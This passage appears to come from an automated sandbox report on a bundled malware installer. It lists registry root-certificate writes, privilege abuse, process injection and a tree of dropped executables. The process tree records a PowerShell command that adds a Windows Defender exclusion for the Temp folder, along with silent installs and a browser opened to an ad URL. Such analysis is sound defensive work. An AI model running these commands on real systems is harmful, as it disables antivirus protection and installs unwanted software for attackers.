2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 8756 PING.EXE 5052 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 81 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 85 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 94 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 106 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4136 WerFault.exe 4136 WerFault.exe 1668 3439763.exe 1668 3439763.exe 2600 WerFault.exe 2600 WerFault.exe 5448 WerFault.exe 5448 WerFault.exe 5872 Process not Found 5872 Process not Found 5232 WerFault.exe 5232 WerFault.exe 4176 WerFault.exe 4176 WerFault.exe 6044 WerFault.exe 6044 WerFault.exe 6048 setup_2.tmp 6048 setup_2.tmp 772 reg.exe 772 reg.exe 5388 WerFault.exe 5388 WerFault.exe 6000 WerFault.exe 6000 WerFault.exe 5292 Conhost.exe 5292 Conhost.exe 5008 8602585.exe 5008 8602585.exe 4648 nxfOBZ7N7BTND0tSNqWtavVB.exe 4648 nxfOBZ7N7BTND0tSNqWtavVB.exe 1384 WerFault.exe 1384 WerFault.exe 5692 ultramediaburner.tmp 5692 ultramediaburner.tmp 5768 3761427.exe 5768 3761427.exe 740 WerFault.exe 740 WerFault.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 6060 3439763.exe 5660 Bedavishala.exe 6060 3439763.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe 5660 Bedavishala.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3240 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4648 nxfOBZ7N7BTND0tSNqWtavVB.exe 15756 F7C5.exe -
Suspicious behavior: SetClipboardViewer 4 IoCs
pid Process 4624 WinHoster.exe 1700 7792766.exe 5320 234875.exe 6288 6067627.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 772 Sun150faeb3537d.exe Token: SeAssignPrimaryTokenPrivilege 772 Sun150faeb3537d.exe Token: SeLockMemoryPrivilege 772 Sun150faeb3537d.exe Token: SeIncreaseQuotaPrivilege 772 Sun150faeb3537d.exe Token: SeMachineAccountPrivilege 772 Sun150faeb3537d.exe Token: SeTcbPrivilege 772 Sun150faeb3537d.exe Token: SeSecurityPrivilege 772 Sun150faeb3537d.exe Token: SeTakeOwnershipPrivilege 772 Sun150faeb3537d.exe Token: SeLoadDriverPrivilege 772 Sun150faeb3537d.exe Token: SeSystemProfilePrivilege 772 Sun150faeb3537d.exe Token: SeSystemtimePrivilege 772 Sun150faeb3537d.exe Token: SeProfSingleProcessPrivilege 772 Sun150faeb3537d.exe Token: SeIncBasePriorityPrivilege 772 Sun150faeb3537d.exe Token: SeCreatePagefilePrivilege 772 Sun150faeb3537d.exe Token: SeCreatePermanentPrivilege 772 Sun150faeb3537d.exe Token: SeBackupPrivilege 772 Sun150faeb3537d.exe Token: SeRestorePrivilege 772 Sun150faeb3537d.exe Token: SeShutdownPrivilege 772 Sun150faeb3537d.exe Token: SeDebugPrivilege 772 Sun150faeb3537d.exe Token: SeAuditPrivilege 772 Sun150faeb3537d.exe Token: SeSystemEnvironmentPrivilege 772 Sun150faeb3537d.exe Token: SeChangeNotifyPrivilege 772 Sun150faeb3537d.exe Token: SeRemoteShutdownPrivilege 772 Sun150faeb3537d.exe Token: SeUndockPrivilege 772 Sun150faeb3537d.exe Token: SeSyncAgentPrivilege 772 Sun150faeb3537d.exe Token: SeEnableDelegationPrivilege 772 Sun150faeb3537d.exe Token: SeManageVolumePrivilege 772 Sun150faeb3537d.exe Token: SeImpersonatePrivilege 772 Sun150faeb3537d.exe Token: SeCreateGlobalPrivilege 772 Sun150faeb3537d.exe Token: 31 772 Sun150faeb3537d.exe Token: 32 772 Sun150faeb3537d.exe Token: 33 772 Sun150faeb3537d.exe Token: 34 772 Sun150faeb3537d.exe Token: 35 772 Sun150faeb3537d.exe Token: SeDebugPrivilege 4620 Sun157ff8e4440aa.exe Token: SeDebugPrivilege 1096 Sun1584240df9fe73a3.exe Token: SeRestorePrivilege 4136 WerFault.exe Token: SeBackupPrivilege 4136 WerFault.exe Token: SeBackupPrivilege 4136 WerFault.exe Token: SeDebugPrivilege 5148 2.exe Token: SeDebugPrivilege 3260 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 5008 8602585.exe Token: SeDebugPrivilege 5904 8.exe Token: SeDebugPrivilege 6028 BearVpn 3.exe Token: SeDebugPrivilege 5292 Conhost.exe Token: SeDebugPrivilege 1668 3439763.exe Token: SeDebugPrivilege 1160 3140108.exe Token: SeDebugPrivilege 3004 46807GHF____.exe Token: SeDebugPrivilege 5768 3761427.exe Token: SeDebugPrivilege 6060 3439763.exe Token: SeDebugPrivilege 2056 3140108.exe Token: SeDebugPrivilege 4792 Maemywinery.exe Token: SeDebugPrivilege 5660 Bedavishala.exe Token: SeDebugPrivilege 1364 SmartPDF.tmp Token: SeDebugPrivilege 1308 LivelyScreenRecJ10.exe Token: SeSecurityPrivilege 5676 msiexec.exe Token: SeCreateTokenPrivilege 4764 installer.exe Token: SeAssignPrimaryTokenPrivilege 4764 installer.exe Token: SeLockMemoryPrivilege 4764 installer.exe Token: SeIncreaseQuotaPrivilege 4764 installer.exe Token: SeMachineAccountPrivilege 4764 installer.exe Token: SeTcbPrivilege 4764 installer.exe Token: SeSecurityPrivilege 4764 installer.exe Token: SeTakeOwnershipPrivilege 4764 installer.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
pid Process 6048 setup_2.tmp 5692 ultramediaburner.tmp 5444 msedge.exe 4764 installer.exe 1364 SmartPDF.tmp 5208 stats.tmp 2644 Rimasta.exe.com 2644 Rimasta.exe.com 2644 Rimasta.exe.com 2644 Rimasta.exe.com 8236 Rimasta.exe.com 8236 Rimasta.exe.com 8236 Rimasta.exe.com 8748 cmd.exe 8748 cmd.exe 8748 cmd.exe 5072 IDownload.tmp 8448 IDownload.App.exe 8448 IDownload.App.exe 8448 IDownload.App.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 2644 Rimasta.exe.com 2644 Rimasta.exe.com 2644 Rimasta.exe.com 2644 Rimasta.exe.com 8236 Rimasta.exe.com 8236 Rimasta.exe.com 8236 Rimasta.exe.com 8748 cmd.exe 8748 cmd.exe 8748 cmd.exe 8448 IDownload.App.exe 8448 IDownload.App.exe 8448 IDownload.App.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 6748 NOVPXvnqRpD8jVFci3hxU9pv.exe 7532 5EX78nuUoq2yG11mnlT26Zrs.exe 6592 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5080 wrote to memory of 3624 5080 setup_x86_x64_install.exe 77 PID 5080 wrote to memory of 3624 5080 setup_x86_x64_install.exe 77 PID 5080 wrote to memory of 3624 5080 setup_x86_x64_install.exe 77 PID 3624 wrote to memory of 4344 3624 setup_installer.exe 78 PID 3624 wrote to memory of 4344 3624 setup_installer.exe 78 PID 3624 wrote to memory of 4344 3624 setup_installer.exe 78 PID 4344 wrote to memory of 4832 4344 setup_install.exe 83 PID 4344 wrote to memory of 4832 4344 setup_install.exe 83 PID 4344 wrote to memory of 4832 4344 setup_install.exe 83 PID 4344 wrote to memory of 5036 4344 setup_install.exe 84 PID 4344 wrote to memory of 5036 4344 setup_install.exe 84 PID 4344 wrote to memory of 5036 4344 setup_install.exe 84 PID 4344 wrote to memory of 5052 4344 setup_install.exe 85 PID 4344 wrote to memory of 5052 4344 setup_install.exe 85 PID 4344 wrote to memory of 5052 4344 setup_install.exe 85 PID 4344 wrote to memory of 3844 4344 setup_install.exe 86 PID 4344 wrote to memory of 3844 4344 setup_install.exe 86 PID 4344 wrote to memory of 3844 4344 setup_install.exe 86 PID 4344 wrote to memory of 2404 4344 setup_install.exe 87 PID 4344 wrote to memory of 2404 4344 setup_install.exe 87 PID 4344 wrote to memory of 2404 4344 setup_install.exe 87 PID 4344 wrote to memory of 1104 4344 setup_install.exe 104 PID 4344 wrote to memory of 1104 4344 setup_install.exe 104 PID 4344 wrote to memory of 1104 4344 setup_install.exe 104 PID 4344 wrote to memory of 3916 4344 setup_install.exe 88 PID 4344 wrote to memory of 3916 4344 setup_install.exe 88 PID 4344 wrote to memory of 3916 4344 setup_install.exe 88 PID 4344 wrote to memory of 2400 4344 setup_install.exe 89 PID 4344 wrote to memory of 2400 4344 setup_install.exe 89 PID 4344 wrote to memory of 2400 4344 setup_install.exe 89 PID 4832 wrote to memory of 2108 4832 cmd.exe 103 PID 4832 wrote to memory of 2108 4832 cmd.exe 103 PID 4832 wrote to memory of 2108 4832 cmd.exe 103 PID 4344 wrote to memory of 4744 4344 setup_install.exe 102 PID 4344 wrote to memory of 4744 4344 setup_install.exe 102 PID 4344 wrote to memory of 4744 4344 setup_install.exe 102 PID 5036 wrote to memory of 4720 5036 cmd.exe 101 PID 5036 wrote to memory of 4720 5036 cmd.exe 101 PID 5052 wrote to memory of 836 5052 cmd.exe 100 PID 5052 wrote to memory of 836 5052 cmd.exe 100 PID 5052 wrote to memory of 836 5052 cmd.exe 100 PID 4344 wrote to memory of 5004 4344 setup_install.exe 90 PID 4344 wrote to memory of 5004 4344 setup_install.exe 90 PID 4344 wrote to memory of 5004 4344 setup_install.exe 90 PID 3844 wrote to memory of 860 3844 cmd.exe 99 PID 3844 wrote to memory of 860 3844 cmd.exe 99 PID 3844 wrote to memory of 860 3844 cmd.exe 99 PID 2404 wrote to memory of 960 2404 cmd.exe 91 PID 2404 wrote to memory of 960 2404 cmd.exe 91 PID 2404 wrote to memory of 960 2404 cmd.exe 91 PID 3916 wrote to memory of 4620 3916 cmd.exe 92 PID 3916 wrote to memory of 4620 3916 cmd.exe 92 PID 1104 wrote to memory of 4652 1104 cmd.exe 98 PID 1104 wrote to memory of 4652 1104 cmd.exe 98 PID 1104 wrote to memory of 4652 1104 cmd.exe 98 PID 2400 wrote to memory of 772 2400 cmd.exe 93 PID 2400 wrote to memory of 772 2400 cmd.exe 93 PID 2400 wrote to memory of 772 2400 cmd.exe 93 PID 4744 wrote to memory of 1096 4744 cmd.exe 94 PID 4744 wrote to memory of 1096 4744 cmd.exe 94 PID 5004 wrote to memory of 3284 5004 cmd.exe 95 PID 5004 wrote to memory of 3284 5004 cmd.exe 95 PID 5004 wrote to memory of 3284 5004 cmd.exe 95 PID 960 wrote to memory of 1560 960 Sun15b61bf18b0f1.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:2108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152260a303c33a7.exe4⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun152260a303c33a7.exeSun152260a303c33a7.exe5⤵
- Executes dropped EXE
PID:4720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15d8dfe2c6d17.exe4⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun15d8dfe2c6d17.exeSun15d8dfe2c6d17.exe5⤵
- Executes dropped EXE
PID:836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun150d896340a863.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun150d896340a863.exeSun150d896340a863.exe5⤵
- Executes dropped EXE
PID:860 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 3006⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2600
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15b61bf18b0f1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun15b61bf18b0f1.exeSun15b61bf18b0f1.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Users\Admin\AppData\Local\Temp\is-N3E46.tmp\Sun15b61bf18b0f1.tmp"C:\Users\Admin\AppData\Local\Temp\is-N3E46.tmp\Sun15b61bf18b0f1.tmp" /SL5="$20208,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun15b61bf18b0f1.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\is-38FVE.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-38FVE.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\PWETJILZEZ\ultramediaburner.exe"C:\Users\Admin\AppData\Local\Temp\PWETJILZEZ\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:980 -
C:\Users\Admin\AppData\Local\Temp\is-JB6FV.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-JB6FV.tmp\ultramediaburner.tmp" /SL5="$20218,281924,62464,C:\Users\Admin\AppData\Local\Temp\PWETJILZEZ\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5692 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
PID:696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4b-74ed6-b22-bd285-5fce9da0c1c0a\Maemywinery.exe"C:\Users\Admin\AppData\Local\Temp\4b-74ed6-b22-bd285-5fce9da0c1c0a\Maemywinery.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4792 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:5444 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd50246f8,0x7fffd5024708,0x7fffd502471810⤵PID:5140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:210⤵PID:5832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:310⤵PID:5340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:810⤵PID:6120
-
-
